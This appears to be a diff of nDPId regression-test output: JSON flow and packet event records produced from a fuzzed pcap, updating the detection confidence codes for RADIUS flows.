00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":620000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":620000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998557316} 00526{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998557233,"pkt":"ABRP+4rqcNuYVcUnCAAlAAClD1JAAPwRRKvG4hk+CgxAHgcUchAAkYCWC7QAiR2+QwBH7d0zmbIWMmGskGYBNTAzMTE0ODAwNzEzqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":184,"flow_first_seen":1528996068129,"flow_last_seen":1528998376770,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":81573,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":184,"flow_first_seen":1528996068129,"flow_last_seen":1528998376770,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":81573,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1528998576080,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998576080,"pkt":"AAAMB6xuABRP+4rqCABFAALbIWRAAP8RAAAKDEAexuIZNXIQBxQCxwAAAbYCvyTqgpE\/GmAmnD4e+SZKCGIaCgAAV8gOBFVTaAwAAFfIDQZ3aWZpOg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqqwATUwMzExNDgwMDcxJQA0MzA0QHdsYW4ubW5jNDgwLm2tYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtNz4eJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b1JXaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDQ5MGFhMjI1YiwgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzBAasFAEQIA5WWldDMlRlc3TpYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABYslAAAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpX1jJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLJQBlc3QgTGFiGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg